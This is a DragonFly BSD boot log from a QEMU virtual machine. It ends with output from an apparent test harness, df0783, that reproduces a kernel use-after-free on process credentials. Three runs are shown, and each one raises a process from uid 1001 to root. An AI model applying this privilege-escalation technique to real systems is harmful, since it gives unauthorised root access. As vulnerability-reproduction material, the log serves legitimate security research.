DF-0783 / escalation_boot.log
XMMNNOO-\|/-\|/-\|/-\|/
1. Boot DragonFly [kernel] ,--, ,--,
2. Boot DragonFly in Safe Mode | `-, _:_ ,-' |
3. Boot DragonFly without AHCI driver `, `-, (/ \) ,-' ,'
4. Boot DragonFly without ACPI driver `-, `-,/ \,-' ,-'
9. Escape to loader prompt (also ESC) `------{ }------'
o. Boot DragonFly using kernel.old ,----------{ }----------,
r. Boot DragonFly to a rescue ramdisk | _,-{ }-,_ |
s. Boot DragonFly in single user mode `-,__,-' \ / `-,__,-'
v. Boot DragonFly with verbose logging | |
R. Reboot | |
| |
| |
| |
| |
`,'
Booting in 10 seconds...
Booting in 9 seconds...
Booting in 8 seconds...
Booting in 7 seconds...
Booting in 6 seconds...
Booting in 5 seconds...
Booting in 4 seconds...
Booting in 3 seconds...
Booting in 2 seconds...
Booting in 1 second...
Booting in 0 seconds...
-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-kernel (from /boot/kernel/kernel) text=0xb39dc0 \|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/data=0x17781d+0x9df863 -\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\syms=[0x8+0xf1878|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|+0x8+0xd3afe/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/]
-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\ehci.ko |/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\size 0x75080 at 0x1c57000
|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/xhci.ko -\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/size 0x84f10 at 0x1ccd000
-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/-\|/Copyright (c) 2003-2026 The DragonFly Project.
Copyright (c) 1992-2003 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
DragonFly 6.5-DEVELOPMENT #0: Fri Jul 3 17:30:11 UTC 2026
root@dfbsd:/usr/obj/usr/src/sys/X86_64_GENERIC.noinv
acpi_hpet: frequency 100000000
Using cputimer HPET for TSC calibration
Timer latency (in TSC ticks): 53713 min=42020 max=115294
TSC clock: 3293741236 Hz, NOT invariant
CPU: QEMU Virtual CPU version 2.5+ (3293.74-MHz K8-class CPU)
Origin="AuthenticAMD" Id=0x60fb1 Family=0xf Model=0x6b Stepping=1
Features=0x1783fbfd<FPU,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,MMX,FXSR,SSE,SSE2,HTT>
Features2=0x80202001<SSE3,CX16,x2APIC,VMM>
AMD Features=0x20100800<SYSCALL,NX,LM>
AMD Features2=0x3<LAHF,CMP>
MONITOR/MWAIT Features=0x2<INTBRK>
VMM/Hypervisor: Origin="KVMKVMKVM"
real memory = 4293381120 (4094 MB)
avail memory = 4089450496 (3900 MB)
LAPIC: enter X2APIC mode
madt_lapic_probe: lapic_count=6 x2apic_count=0
ACPI CPUS = 6
lapic: divisor index 0, frequency 500004529 Hz
core_bits 3 logical_CPU_bits 0
CPU Topology: cores_per_chip: 6; threads_per_core: 1; chips_per_package: 1;
srat_probe: can't locate SRAT
SMI Frequency (worst case): 1001 Hz (999 us)
Initialize MI interrupts for 6 cpus
TSC is not invariant, no further tests will be performed
Spectre: support=( none ) req=ffff operating=( none )
MDS: support=( MDS_NOT_REQUIRED ) req=0000 operating=( none )
interrupt uses mplock: swi_taskq
wdog: In-kernel automatic watchdog reset enabled
md0: Malloc disk
evdev device loaded.
kbd1 at kbdmux0
ACPI: RSDP 0x00000000000F59A0 000014 (v00 BOCHS )
ACPI: RSDT 0x00000000BFFE1CAC 000034 (v01 BOCHS BXPC 00000001 BXPC 00000001)
ACPI: FACP 0x00000000BFFE1B38 000074 (v01 BOCHS BXPC 00000001 BXPC 00000001)
ACPI: DSDT 0x00000000BFFE0040 001AF8 (v01 BOCHS BXPC 00000001 BXPC 00000001)
ACPI: FACS 0x00000000BFFE0000 000040
ACPI: APIC 0x00000000BFFE1BAC 0000A0 (v01 BOCHS BXPC 00000001 BXPC 00000001)
ACPI: HPET 0x00000000BFFE1C4C 000038 (v01 BOCHS BXPC 00000001 BXPC 00000001)
ACPI: WAET 0x00000000BFFE1C84 000028 (v01 BOCHS BXPC 00000001 BXPC 00000001)
sc0: <System console> on motherboard
sc0: VGA <16 virtual consoles, flags=0x100>
acpi0: <BOCHS BXPC> on motherboard
ACPI: 1 ACPI AML tables successfully acquired and loaded
ACPI FADT: SCI testing interrupt mode ...
ACPI FADT: SCI select level/high
acpi0: Power Button (fixed)
acpi_hpet0: <High Precision Event Timer> iomem 0xfed00000-0xfed003ff on acpi0
acpi_timer0 on acpi0
isab0: <ACPI Generic ISA bridge> on acpi0
isa0: <ISA bus> on isab0
cpu0: <ACPI CPU> on acpi0
cpu_cst0: <ACPI CPU C-State> on cpu0
cpu1: <ACPI CPU> on acpi0
cpu_cst1: <ACPI CPU C-State> on cpu1
cpu2: <ACPI CPU> on acpi0
cpu_cst2: <ACPI CPU C-State> on cpu2
cpu3: <ACPI CPU> on acpi0
cpu_cst3: <ACPI CPU C-State> on cpu3
cpu4: <ACPI CPU> on acpi0
cpu_cst4: <ACPI CPU C-State> on cpu4
cpu5: <ACPI CPU> on acpi0
cpu_cst5: <ACPI CPU C-State> on cpu5
pcib0: <ACPI Host-PCI bridge> port 0xcf8-0xcff on acpi0
pci0: <ACPI PCI bus> on pcib0
isab1: <PCI-ISA bridge> at device 1.0 on pci0
isa1: <ISA bus> on isab1
atapci0: <Intel PIIX3 WDMA2 controller> port 0xc0a0-0xc0af,0x376,0x170-0x177,0x3f6,0x1f0-0x1f7 at device 1.1 on pci0
ata0: <ATA channel 0> on atapci0
interrupt uses mplock: ata0
ata1: <ATA channel 1> on atapci0
interrupt uses mplock: ata1
acd0: DVDROM <QEMU DVD-ROM/2.5+> at ata1-master WDMA2
pci0: <bridge> (vendor 0x8086, dev 0x7113) at device 1.3 irq 9
vgapci0: <VGA-compatible display> mem 0xfebd0000-0xfebd0fff,0xfd000000-0xfdffffff at device 2.0 on pci0
vgapci0: Boot video device
virtio_pci0: <VirtIO PCI Network adapter> port 0xc080-0xc09f mem 0xfe000000-0xfe003fff,0xfebd1000-0xfebd1fff irq 11 at device 3.0 on pci0
vtnet0: <VirtIO Networking Adapter> on virtio_pci0
virtio_pci0: host features: 0x79bf8064 <EventIdx,RingIndirect,AnyLayout,NotifyOnEmpty,SetMacAddress,GuestAnnounce,RxModeExtra,VLanFilter,RxMode,ControlVq,Status,MrgRxBuf,TxAllGSO,MacAddress,DynOffload>
virtio_pci0: negotiated features: 0x198f8020 <RingIndirect,AnyLayout,NotifyOnEmpty,SetMacAddress,VLanFilter,RxMode,ControlVq,Status,MrgRxBuf,MacAddress>
virtio_pci0: using 3 MSI-X vectors
vtnet0: MAC address: 52:54:00:12:34:56
virtio_pci1: <VirtIO PCI Block adapter> port 0xc000-0xc07f mem 0xfe004000-0xfe007fff,0xfebd2000-0xfebd2fff irq 11 at device 4.0 on pci0
vtblk0: <VirtIO Block Adapter> on virtio_pci1
virtio_pci1: host features: 0x79007e54 <EventIdx,RingIndirect,AnyLayout,NotifyOnEmpty,WriteZeroes,Discard,MultiQueue,ConfigWCE,Topology,FlushCommand,BlockSize,DiskGeometry,MaxNumSegs>
virtio_pci1: negotiated features: 0x10001a54 <RingIndirect,MultiQueue,ConfigWCE,FlushCommand,BlockSize,DiskGeometry,MaxNumSegs>
virtio_pci1: using 6 MSI-X vectors
vtblk0: Virtio: ncylinders at legacy maximum (16383), recalculating to 62415
vtblk0: Block size: 512
vtblk0: 30720MB (62914560 512 byte sectors: 16H 63S/T 16383C)
atkbdc0: <Keyboard controller (i8042)> port 0x64,0x60 irq 1 on acpi0
atkbd0: <AT Keyboard> irq 1 on atkbdc0
kbd0 at atkbd0
psm0: <PS/2 Mouse> irq 12 on atkbdc0
interrupt uses mplock: psm0
psm0: model IntelliMouse Explorer, device ID 4
sio0: <16550A-compatible COM port> port 0x3f8-0x3ff irq 4 on acpi0
sio0: type 16550A, console
ACPI: Enabled 2 GPEs in block 00 to 0F
rdrand0: No RdRand support.
orm0: <ISA Option ROM> at iomem 0xe8000-0xeffff on isa1
vga0: <Generic ISA VGA> at port 0x3c0-0x3df iomem 0xa0000-0xbffff on isa1
sio2: can't drain, serial port might not exist, disabling
hpt27xx: no controller detected.
CAM: Configuring 2 busses
CAM: finished configuring all busses
cd0 at ata1 bus 0 target 0 lun 0
cd0: <QEMU QEMU DVD-ROM 2.5+> Removable CD-ROM SCSI-0 device
cd0: 16.000MB/s transfers
cd0: Attempt to query device size failed: NOT READY, Medium not present
Mounting root from hammer2:vbd0s1d
hammer2_mount: root devstr="vbd0s1d"
hammer2_mount: device="vbd0s1d" label="ROOT" rdonly=1
hammer2_ondisk: "/dev/vbd0s1d" zone=0 id=0 offset=0x0000000000000000 size=0x000000063f000000
hammer2_mount: hmp=0xfffff8008fb00000 pmp=0xfffff800902a0000
DMA space used: 13580k, remaining available: 131072k
Mounting devfs
Loading configuration files.
Loading devfs rules: /etc/defaults/devfs.conf.
Initializing random seed: done.
dumpon: crash dumps to /dev/vbd0s1b (25, 0x20001)
Starting file system checks:
/dev/vbd0s1a: 1397 files, 253258 used, 269901 free (1501 frags, 33550 blocks, 0.3% fragmentation)
mount_hammer2: unable to connect to cluster controller
mount_hammer2: cluster_connect(/dev/vbd0s1d@ROOT) failed
hammer2_mount: "vbd0s1d": no recovery needed
hammer2: enable read/write
HAMMER2: VOLDATA DUMP
HAMMER2: INITIATE SPANs
mount_hammer2: unable to connect to cluster controller
mount_hammer2: cluster_connect(/dev/vbd0s1d@ROOT) failed
Mounting tmpfs at /var/run/shm.
Setting hostname: dfbsd.
Starting dhclient.
starting dhclient on vtnet0
lo0: flags=808049<UP,LOOPBACK,RUNNING,MULTICAST,PROXY> metric 0 mtu 16384
options=43<RXCSUM,TXCSUM,RSS>
inet 127.0.0.1 netmask 0xff000000
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2
groups: lo
vtnet0: flags=808843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST,PROXY> metric 0 mtu 1500
options=28<VLAN_MTU,JUMBO_MTU>
ether 52:54:00:12:34:56
inet6 fe80::5054:ff:fe12:3456%vtnet0 prefixlen 64 tentative scopeid 0x1
inet 10.0.2.15 netmask 0xffffff00 broadcast 10.0.2.255
media: Ethernet 1000baseT <full-duplex>
status: active
route: writing to routing socket: File exists
add net default: gateway 10.0.2.2: File exists
Additional routing options:.
Starting devd.
Additional TCP options:.
Mounting NFS file systems:.
ELF ldconfig path: /lib /usr/lib /usr/local/lib /usr/local/libdata/ldconfig/pkg
Building databases...
Starting syslogd.
Jul 4 14:46:19 dfbsd syslogd: kernel boot file is /boot/kernel/kernel
No core dumps found.
swap low/high-water marks set to 41940/62910
swapon: adding /dev/vbd0s1b as swap device
NFS CLIENT: access_cache_timeout=5 neg_cache_timeout=3.
Starting local daemons:.
Updating motd.
Configuring syscons: blanktime.
Starting sshd.
sendmail_submit: /etc/mail/aliases.db not present, generating
sendmail_clientmqueue: /etc/mail/aliases.db not present, generating
Starting cron.
Local package initialization:.
Sat Jul 4 14:46:19 UTC 2026
DragonFly/x86_64 (dfbsd) (ttyd0)
login: df0783: harness loaded; /dev/df0783_esc ready (write 192 bytes to escalate curproc to uid=0)
df0783: pid=1273 ucred=0xfffff8008f8afd00 freeme=0xfffff8008f8afd38 cr_uid=1001
df0783: zone_owner_cpu=0 my_cpu=2
df0783: migrated to cpu 0 (now on 0)
df0783: kfree(0xfffff8008f8afd38, M_TEMP) โ replicating bug's free
df0783: drain overflow, freeing all
df0783: kmalloc didn't reclaim freeme after 64 iters; writing directly (no-INVARIANTS allows writes to freed chunks)
df0783: WARNING: freeme not in z_LChunks
df0783: post-exploit cr=0xfffff8008f8afd00 cr_uid=0 (was 1001)
df0783: pid=1297 ucred=0xfffff8008f8cfa00 freeme=0xfffff8008f8cfa38 cr_uid=1001
df0783: zone_owner_cpu=0 my_cpu=0
df0783: kfree(0xfffff8008f8cfa38, M_TEMP) โ replicating bug's free
df0783: drain overflow, freeing all
df0783: kmalloc didn't reclaim freeme after 64 iters; writing directly (no-INVARIANTS allows writes to freed chunks)
df0783: WARNING: freeme not in z_LChunks
df0783: post-exploit cr=0xfffff8008f8cfa00 cr_uid=0 (was 1001)
df0783: pid=1305 ucred=0xfffff8008f8afd00 freeme=0xfffff8008f8afd38 cr_uid=1001
df0783: zone_owner_cpu=0 my_cpu=3
df0783: migrated to cpu 0 (now on 0)
df0783: kfree(0xfffff8008f8afd38, M_TEMP) โ replicating bug's free
df0783: drain overflow, freeing all
df0783: kmalloc didn't reclaim freeme after 64 iters; writing directly (no-INVARIANTS allows writes to freed chunks)
df0783: WARNING: freeme not in z_LChunks
df0783: post-exploit cr=0xfffff8008f8afd00 cr_uid=0 (was 1001)